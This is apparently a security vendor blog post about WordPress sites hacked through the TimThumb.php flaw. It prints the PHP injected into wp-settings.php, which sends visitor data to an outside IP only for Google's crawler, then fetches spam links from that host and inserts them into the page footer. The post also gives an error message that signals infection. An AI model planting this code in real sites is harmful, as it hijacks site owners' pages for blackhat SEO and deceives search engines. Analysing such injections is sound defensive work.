We have been talking a lot lately about the Timthumb.php vulnerability and the importance of updating that script as soon as possible. Sites that didn’t update it are getting compromised very easily. We explained it in more detail here: Mass infection of WordPress sites because of TimThumb.php.
What we are seeing now is sites getting compromised to load links for blackhat seo purposes. They have their wp-settings.php modified with the following code:
function google_bot() {$sUserAgent = strtolower($_SERVER[‘HTTP_USER_AGENT’]);if(!(strpos($sUserAgent, ‘google’) === false)) {if(isset($_SERVER[‘REMOTE_ADDR’]) == true && isset($_SERVER[‘HTTP_HOST’]) == true){$ch = curl_init("http://91.196.216.30/bot.php?ip=’.$_SERVER[‘REMOTE_ADDR"].’&host=’.$_SERVER[‘HTTP_HOST’].
‘&ua=’.urlencode($_SERVER[‘HTTP_USER_AGENT’]).’&ref=’.$_SERVER
[‘HTTP_REFERER’]);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_TIMEOUT, 10);$re = curl_exec($ch);curl_close($ch);echo $re;}}}add_action(‘wp_footer’, "google_bot");
What this code does is very simple. It connects to http://91.196.216.30/bot.php to get a few links to be added to the bottom of your site. Links like:
<a href="http://albertasportswear.com /wp-content/uploads/sweaters/sweater_tights.html" alt="Sweater
Tights" title="Sweater Tights">Sweater Tights</a>
dilbert sweater vest comic
<br>knitting softwares
the knitting room fond du lac
<a href="http://bettyoctopus.com /wp-content/uploads/knitting/knitting_instructions.html" alt="Knitting
Instructions" title="Knitting Instructions">Knitting Instructions</a>
knitting little luxuries louisa harding
It’s very dynamic, always changing. So in addition to having malware and infecting your users, you could be helping the attackers with page rank as well.
What is interesting is that on some sites the attackers are not only attempting to infect, but are doing it incorrectly leaving some extra lines at the bottom of the wp-settings.php, causing the sites to fail with this error:
Warning: Cannot modify header information – headers already sent by (output started at /home/site/public_html/wp-settings.php:310) in /home1/site/public_html/wp-includes/pluggable.php on line 890
So if you have this warning (headers already sent by (output started at /home/site/public_html/wp-settings.php:310) on your site, it means you are likely compromised as well.
You can check your site here to see if it has this issue: Sucuri SiteCheck
If you need help cleaning up up, sign up here: http://sucuri.net/signup
Leave a reply